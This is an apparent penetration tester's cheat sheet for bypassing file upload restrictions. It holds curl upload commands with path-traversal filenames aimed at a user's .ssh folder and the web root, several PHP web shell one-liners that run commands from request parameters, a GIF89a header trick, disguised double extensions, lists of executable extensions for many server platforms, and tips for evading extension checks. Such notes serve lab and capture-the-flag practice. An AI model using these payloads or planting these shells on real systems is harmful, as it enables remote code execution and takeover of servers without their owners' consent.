file-upload
File Upload bypass
Upload file with curl
echo "szalek" > poc.txt
curl -F 'file=@/home/kali/workspace/poc.txt' -F 'filename=poc.txt' $IP:33414/file-upload
curl -F 'file=@/home/kali/workspace/poc.txt' -F 'filename=/home/alfredo/.ssh/poc.txt' $IP:33414/file-upload
curl -F 'file=@/home/kali/workspace/poc.txt' -F 'filename=/var/www/html/poc.txt' $IP:33414/file-upload
Other
Metatag with exif tool
Content
GIF89a1
<?php $a=system($_GET['cmd']); echo $a;?>
<?php system('whoami'); ?>
<?php exec('whoami'); ?>
<?php passthru('whoami'); ?>
<?php shell_exec('whoami'); ?>
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
<?php preg_replace('/.*/e', 'system("whoami");', ''); ?>
Filters
evil.png;.php
evil.gif.php
evil.gif.php5
evil.php;gif
evil.config
evil.htaccess
--other-extensions--
php3
php4
php5
php7
pht
phtm
phtml
phar
phps
PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc
ASP: .asp, .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action
Coldfusion: .cfm, .cfml, .cfc, .dbm
Flash: .swf
Perl: .pl, .cgi
Erlang Yaws Web Server: .yaws
Bypass file extensions checks
- Try upper cases: pHp, .pHP5, .PhAr ...
- Add a valid extension before the execution extension: file.png.Php5
-
Add special characters at the end. Use burpsuite-intruder to make it easy
-
Try to bypass the protections tricking the extension parser of the server-side with techniques like doubling the extension or adding junk data (null bytes) between extensions.